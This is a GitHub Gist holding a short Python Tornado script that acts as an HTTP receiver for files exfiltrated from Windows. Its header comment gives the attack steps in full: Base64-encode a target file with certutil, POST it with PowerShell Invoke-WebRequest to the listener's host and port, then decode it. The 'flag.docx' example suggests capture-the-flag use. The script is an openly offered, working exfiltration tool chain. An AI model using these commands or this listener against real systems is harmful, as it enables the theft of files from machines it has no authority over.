Last active
January 12, 2019 11:31
-
-
Save frennkie/c0f4f1ccda0660f2807f6637d1b4f02f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Exfiltrate a file from Windows Powershell over HTTP Post using certutil for | |
| # Base64 conversion to avoid broken file due to text based post transmission. | |
| # | |
| # Requires | |
| # pip install tornado | |
| # Sample usage (exfiltrate flag.docx) | |
| # python certutilpostreciver.py | |
| # certutil -encode flag.docx ([System.IO.Path]::GetTempPath()+"b64.txt)" | |
| # Invoke-WebRequest -Uri http://fqdn:port -Method POST -Body (Get-Content([System.IO.Path]::GetTempPath()+"b64.txt")) | |
| # cat output64.txt | base64 -d > flag.docx | |
| import tornado.ioloop | |
| import tornado.web | |
| import pprint | |
| class CertUtilPostHandler(tornado.web.RequestHandler): | |
| def initialize(self, filename, verbose): | |
| self.filename = filename | |
| self.verbose = verbose | |
| def post(self): | |
| pprint.pprint(self.request) | |
| if self.verbose: | |
| pprint.pprint(self.request.body) | |
| with open(self.filename, "wb") as f: | |
| for line in self.request.body.split(" "): | |
| if "-----BEGIN" in line: | |
| continue | |
| if "-----END" in line: | |
| continue | |
| if "CERTIFICATE-----" in line: | |
| continue | |
| f.write("{}\n".format(line)) | |
| def main(): | |
| filename = "output64.txt" | |
| port = 4711 | |
| verbose = False | |
| application = tornado.web.Application([(r"/.*", CertUtilPostHandler, | |
| dict(filename=filename, verbose=verbose)), ]) | |
| application.listen(port) | |
| tornado.ioloop.IOLoop.instance().start() | |
| if __name__ == "__main__": | |
| main() | |
| # EOF |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment